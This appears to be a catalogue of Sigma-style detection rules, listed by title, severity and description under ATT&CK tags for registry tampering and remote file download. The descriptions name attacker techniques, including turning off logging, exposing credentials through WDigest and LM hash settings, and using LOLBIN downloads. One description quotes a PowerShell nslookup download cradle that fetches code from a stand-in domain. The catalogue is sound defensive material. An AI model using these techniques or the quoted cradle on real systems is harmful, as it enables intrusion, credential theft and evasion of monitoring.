  • PUA - Wsudo Suspicious Execution - Level: high
    Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
  • Python Inline Command Execution - Level: medium
    Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code.
  • Python Spawning Pretty TTY on Windows - Level: high
    Description: Detects python spawning a pretty tty
  • Suspicious Greedy Compression Using Rar.EXE - Level: high
    Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
  • Suspicious RASdial Activity - Level: medium
    Description: Detects suspicious process related to rasdial.exe
  • Renamed CURL.EXE Execution - Level: medium
    Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
  • Renamed FTP.EXE Execution - Level: medium
    Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
  • Renamed NirCmd.EXE Execution - Level: high
    Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
  • Renamed PingCastle Binary Execution - Level: high
    Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
  • Ruby Inline Command Execution - Level: medium
    Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.
  • Elevated System Shell Spawned From Uncommon Parent Location - Level: medium
    Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.
  • Potentially Suspicious Execution From Parent Process In Public Folder - Level: high
    Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
  • Writing Of Malicious Files To The Fonts Folder - Level: medium
    Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
  • Suspicious Scan Loop Network - Level: medium
    Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
  • Suspicious Program Names - Level: high
    Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
  • Script Interpreter Execution From Suspicious Folder - Level: high
    Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables
  • Suspicious Script Execution From Temp Folder - Level: high
    Description: Detects a suspicious script executions from temporary folder
  • Sysprep on AppData Folder - Level: medium
    Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
  • Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script - Level: medium
    Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
  • Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script - Level: high
    Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
  • VMToolsd Suspicious Child Process - Level: high
    Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup
  • Add New Download Source To Winget - Level: medium
    Description: Detects usage of winget to add new additional download sources
  • Add Insecure Download Source To Winget - Level: high
    Description: Detects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
  • Add Potential Suspicious New Download Source To Winget - Level: medium
    Description: Detects usage of winget to add new potentially suspicious download sources
  • Install New Package Via Winget Local Manifest - Level: medium
    Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.
  • Turla Group Lateral Movement - Level: critical
    Description: Detects automated lateral movement by Turla group
  • Lazarus Group Activity - Level: critical
    Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
  • Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
  • Potential CVE-2021-40444 Exploitation Attempt - Level: high
    Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
  • REvil Kaseya Incident Malware Patterns - Level: critical
    Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) - Level: high
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE - Level: medium
    Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. Hunting Opportunity Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
  • DarkGate - Autoit3.EXE File Creation By Uncommon Process - Level: medium
    Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
  • DarkGate - Autoit3.EXE Execution Parameters - Level: high
    Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server.
  • Ursnif Redirection Of Discovery Commands - Level: high
    Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
  • DarkGate - Drop DarkGate Loader In C:\Temp Directory - Level: medium
    Description: Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder.
  • Potential KamiKakaBot Activity - Lure Document Execution - Level: medium
    Description: Detects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
  • DNS Request From Windows Script Host - Level: low
    Description: Detects unusual domain resolutions originating from CScript/WScript that can identify malicious javascript files executing in an environment, often as a result from a phishing or watering hole attack.
  • Elevated System Shell Spawned - Level: medium
    Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
  • Manual Execution of Script Inside of a Compressed File - Level: medium
    Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries. From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios. 1. Compressed file opened using 7zip. 2. Compressed file opened using WinRar. 3. Compressed file opened using native windows File Explorer capabilities. When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter."
  • Automated Turla Group Lateral Movement - Level: medium
    Description: Detects automated lateral movement by Turla group
  • Quick Execution of a Series of Suspicious Commands - Level: low
    Description: Detects multiple suspicious process in a limited timeframe
attack.t1112 87
Show Rules (87)
  • Abusing Windows Telemetry For Persistence - Registry - Level: high
    Description: Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
  • Service Binary in Uncommon Folder - Level: medium
    Description: Detect the creation of a service with a service binary located in a uncommon directory
  • Office Security Settings Changed - Level: high
    Description: Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)
  • Remote Registry Lateral Movement - Level: high
    Description: Detects remote RPC calls to modify the registry and possible execute code
  • ETW Logging Disabled In .NET Processes - Registry - Level: high
    Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
  • NetNTLM Downgrade Attack - Level: high
    Description: Detects NetNTLM downgrade attack
  • Sysmon Channel Reference Deletion - Level: high
    Description: Potential threat actor tampering with Sysmon manifest and eventually disabling it
  • New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE - Level: high
    Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
  • Imports Registry Key From a File - Level: medium
    Description: Detects the import of the specified file to the registry with regedit.exe.
  • Imports Registry Key From an ADS - Level: high
    Description: Detects the import of a alternate datastream to the registry with regedit.exe.
  • Suspicious Registry Modification From ADS Via Regini.EXE - Level: high
    Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.
  • Registry Modification Via Regini.EXE - Level: low
    Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.
  • Potentially Suspicious Desktop Background Change Using Reg.EXE - Level: medium
    Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
  • Potential Suspicious Registry File Imported Via Reg.EXE - Level: medium
    Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
  • Enable LM Hash Storage - ProcCreation - Level: high
    Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
  • RestrictedAdminMode Registry Value Tampering - ProcCreation - Level: high
    Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
  • Potential Tampering With RDP Related Registry Keys Via Reg.EXE - Level: high
    Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
  • Reg Add Suspicious Paths - Level: high
    Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys
  • ShimCache Flush - Level: high
    Description: Detects actions that clear the local ShimCache and remove forensic evidence
  • Run Once Task Execution as Configured in Registry - Level: low
    Description: This rule detects the execution of Run Once task as configured in the registry
  • Non-privileged Usage of Reg or Powershell - Level: high
    Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
  • Suspicious VBoxDrvInst.exe Parameters - Level: medium
    Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
  • Potential NetWire RAT Activity - Registry - Level: high
    Description: Detects registry keys related to NetWire RAT
  • Terminal Server Client Connection History Cleared - Registry - Level: high
    Description: Detects the deletion of registry keys containing the MSTSC connection history
  • Removal of Potential COM Hijacking Registry Keys - Level: medium
    Description: Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
  • Disable Security Events Logging Adding Reg Key MiniNt - Level: high
    Description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.
  • Wdigest CredGuard Registry Modification - Level: high
    Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials.
  • Registry Entries For Azorult Malware - Level: critical
    Description: Detects the presence of a registry key created during Azorult execution
  • Potential Qakbot Registry Activity - Level: high
    Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
  • NetNTLM Downgrade Attack - Registry - Level: high
    Description: Detects NetNTLM downgrade attack
  • RedMimicry Winnti Playbook Registry Manipulation - Level: high
    Description: Detects actions caused by the RedMimicry Winnti playbook
  • Run Once Task Configuration in Registry - Level: medium
    Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
  • Allow RDP Remote Assistance Feature - Level: medium
    Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine
  • New BgInfo.EXE Custom DB Path Registry Configuration - Level: medium
    Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
  • New BgInfo.EXE Custom WMI Query Registry Configuration - Level: medium
    Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"
  • New BgInfo.EXE Custom VBScript Registry Configuration - Level: medium
    Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
  • Blackbyte Ransomware Registry - Level: high
    Description: BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption
  • ClickOnce Trust Prompt Tampering - Level: medium
    Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
  • CrashControl CrashDump Disabled - Level: medium
    Description: Detects disabling the CrashDump per registry (as used by HermeticWiper)
  • Service Binary in Suspicious Folder - Level: high
    Description: Detect the creation of a service with a service binary located in a suspicious directory
  • Potentially Suspicious Desktop Background Change Via Registry - Level: medium
    Description: Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
  • DHCP Callout DLL Installation - Level: high
    Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
  • Disable Internal Tools or Feature in Registry - Level: medium
    Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
  • Disable Windows Security Center Notifications - Level: medium
    Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification
  • Add DisallowRun Execution to Registry - Level: medium
    Description: Detect set DisallowRun to 1 to prevent user running specific computer program
  • DNS-over-HTTPS Enabled by Registry - Level: medium
    Description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
  • New DNS ServerLevelPluginDll Installed - Level: high
    Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
  • ETW Logging Disabled In .NET Processes - Sysmon Registry - Level: high
    Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
  • Change User Account Associated with the FAX Service - Level: high
    Description: Detect change of the user account associated with the FAX service to avoid the escalation problem.
  • Change the Fax Dll - Level: high
    Description: Detect possible persistence using Fax DLL load when service restart
  • Registry Hide Function from User - Level: medium
    Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
  • RestrictedAdminMode Registry Value Tampering - Level: high
    Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
  • Blue Mockingbird - Registry - Level: high
    Description: Attempts to detect system changes made by Blue Mockingbird
  • NET NGenAssemblyUsageLog Registry Key Tamper - Level: high
    Description: Detects changes to the NGenAssemblyUsageLog registry key. .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
  • Trust Access Disable For VBApplications - Level: high
    Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.
  • Outlook EnableUnsafeClientMailRules Setting Enabled - Registry - Level: high
    Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
  • Uncommon Microsoft Office Trusted Location Added - Level: high
    Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.
  • Macro Enabled In A Potentially Suspicious Document - Level: high
    Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
  • Office Macros Warning Disabled - Level: high
    Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
  • Potential Persistence Via Custom Protocol Handler - Level: medium
    Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
  • Potential Persistence Via Event Viewer Events.asp - Level: medium
    Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
  • Modification of IE Registry Settings - Level: low
    Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence
  • Potential Persistence Via Outlook Today Page - Level: high
    Description: Detects potential persistence activity via outlook today page. An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
  • Potential Persistence Via Outlook Home Page - Level: high
    Description: Detects potential persistence activity via outlook home page. An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
  • ETW Logging Disabled For rpcrt4.dll - Level: low
    Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
  • ETW Logging Disabled For SCM - Level: low
    Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
  • Registry Explorer Policy Modification - Level: medium
    Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)
  • Activate Suppression of Windows Security Center Notifications - Level: medium
    Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification
  • Enable LM Hash Storage - Level: high
    Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
  • RDP Sensitive Settings Changed to Zero - Level: medium
    Description: Detects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
  • RDP Sensitive Settings Changed - Level: high
    Description: Detects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
  • Wdigest Enable UseLogonCredential - Level: high
    Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
  • Winlogon AllowMultipleTSSessions Enable - Level: medium
    Description: Detects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
  • OceanLotus Registry Activity - Level: critical
    Description: Detects registry keys created in OceanLotus (also known as APT32) attacks
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Potential Ursnif Malware Activity - Registry - Level: high
    Description: Detects registry keys related to Ursnif malware.
  • CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry - Level: high
    Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
  • Blue Mockingbird - Level: high
    Description: Attempts to detect system changes made by Blue Mockingbird
  • FlowCloud Registry Markers - Level: critical
    Description: Detects FlowCloud malware registry markers from threat group TA410. The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
  • Potential Raspberry Robin Registry Set Internet Settings ZoneMap - Level: low
    Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
  • Remote Registry Management Using Reg Utility - Level: medium
    Description: Remote registry management using REG utility from non-admin workstation
  • Access To .Reg/.Hive Files By Uncommon Applications - Level: low
    Description: Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.
  • Microsoft Office Trusted Location Updated - Level: medium
    Description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions.
  • Service Binary in User Controlled Folder - Level: medium
    Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\". Attackers often use such directories for staging purposes. This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation. Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
attack.t1105 70
Show Rules (70)
  • Microsoft Binary Github Communication - Level: high
    Description: Detects an executable in the Windows folder accessing github.com
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
  • Abusing Findstr for Defense Evasion - Level: medium
    Description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism
  • Suspicious File Download Using Office Application - Level: high
    Description: Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files
  • Nslookup PwSh Download Cradle - Level: medium
    Description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
  • Windows Update Client LOLBIN - Level: high
    Description: Detects code execution via the Windows Update client (wuauclt)
  • Remote File Copy - Level: low
    Description: Detects the use of tools that copy files from or to remote systems
  • Wget Creating Files in Tmp Directory - Level: medium
    Description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
  • Curl Usage on Linux - Level: low
    Description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
  • Suspicious Curl File Upload - Linux - Level: medium
    Description: Detects a suspicious curl process start the adds a file to a web request
  • Download File To Potentially Suspicious Directory Via Wget - Level: medium
    Description: Detects the use of wget to download content to a suspicious directory
  • Hidden Flag Set On File/Directory Via Chflags - MacOS - Level: medium
    Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
  • File Download Via Nscurl - MacOS - Level: medium
    Description: Detects the execution of the nscurl utility in order to download files.
  • Potential In-Memory Download And Compile Of Payloads - Level: medium
    Description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
  • Cisco Stage Data - Level: low
    Description: Various protocols maybe used to put data on the device for exfil or infil
  • Executable from Webdav - Level: medium
    Description: Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/
  • Download from Suspicious Dyndns Hosts - Level: medium
    Description: Detects download of certain file types from hosts with dynamic DNS names (selected list)
  • Password Protected ZIP File Opened (Suspicious Filenames) - Level: high
    Description: Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.
  • AppX Package Installation Attempts Via AppInstaller.EXE - Level: medium
    Description: Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL
  • Suspicious Desktopimgdownldr Target File - Level: high
    Description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
  • Uncommon Network Connection Initiated By Certutil.EXE - Level: high
    Description: Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.
  • Suspicious Dropbox API Usage - Level: high
    Description: Detects an executable that isn't dropbox but communicates with the Dropbox API
  • Network Connection Initiated By IMEWDBLD.EXE - Level: high
    Description: Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
  • Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location - Level: high
    Description: Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
  • Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder - Level: high
    Description: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
  • Outbound Network Connection Initiated By Script Interpreter - Level: high
    Description: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.
  • Local Network Connection Initiated By Script Interpreter - Level: medium
    Description: Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.
  • Potential COM Objects Download Cradles Usage - PS Script - Level: medium
    Description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
  • Browser Execution In Headless Mode - Level: medium
    Description: Detects execution of Chromium based browser in headless mode
  • File Download with Headless Browser - Level: high
    Description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
  • File Download From Browser Process Via Inline URL - Level: medium
    Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
  • File Download via CertOC.EXE - Level: medium
    Description: Detects when a user downloads a file by using CertOC.exe
  • File Download From IP Based URL Via CertOC.EXE - Level: high
    Description: Detects when a user downloads a file from an IP based URL using CertOC.exe
  • Curl Download And Execute Combination - Level: high
    Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
  • Command Line Execution with Suspicious URL and AppData Strings - Level: medium
    Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
  • Potential Download/Upload Activity Using Type Command - Level: medium
    Description: Detects usage of the "type" command to download/upload data from WebDAV server
  • Suspicious Curl.EXE Download - Level: high
    Description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file
  • Remote File Download Via Desktopimgdownldr Utility - Level: medium
    Description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.
  • Suspicious Desktopimgdownldr Command - Level: high
    Description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
  • Remote File Download Via Findstr.EXE - Level: medium
    Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
  • Insensitive Subfolder Search Via Findstr.EXE - Level: low
    Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
  • Finger.EXE Execution - Level: high
    Description: Detects execution of the "finger.exe" utility. Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.
  • Arbitrary File Download Via GfxDownloadWrapper.EXE - Level: medium
    Description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.
  • File Download Using Notepad++ GUP Utility - Level: high
    Description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.
  • File Download And Execution Via IEExec.EXE - Level: high
    Description: Detects execution of the IEExec utility to download and execute files
  • Import LDAP Data Interchange Format File Via Ldifde.EXE - Level: medium
    Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
  • Suspicious Diantz Download and Compress Into a CAB File - Level: medium
    Description: Download and compress a remote file and store it in a cab file on local machine.
  • Suspicious Extrac32 Execution - Level: medium
    Description: Download or Copy file with Extrac32
  • PrintBrm ZIP Creation of Extraction - Level: high
    Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
  • Replace.exe Usage - Level: medium
    Description: Detects the use of Replace.exe which can be used to replace file with another file
  • Suspicious Certreq Command to Download - Level: high
    Description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files
  • File Download Via Windows Defender MpCmpRun.EXE - Level: high
    Description: Detects the use of Windows Defender MpCmdRun.EXE to download files
  • MsiExec Web Install - Level: medium
    Description: Detects suspicious msiexec process starts with web addresses as parameter
  • Potential COM Objects Download Cradles Usage - Process Creation - Level: medium
    Description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
  • PowerShell Web Download - Level: medium
    Description: Detects suspicious ways to download files or content using PowerShell
  • Potential DLL File Download Via PowerShell Invoke-WebRequest - Level: medium
    Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
  • Suspicious Invoke-WebRequest Execution With DirectIP - Level: medium
    Description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
  • Suspicious Invoke-WebRequest Execution - Level: high
    Description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location
  • PowerShell DownloadFile - Level: high
    Description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
  • PUA - Nimgrab Execution - Level: high
    Description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.
  • Suspicious Download from Office Domain - Level: high
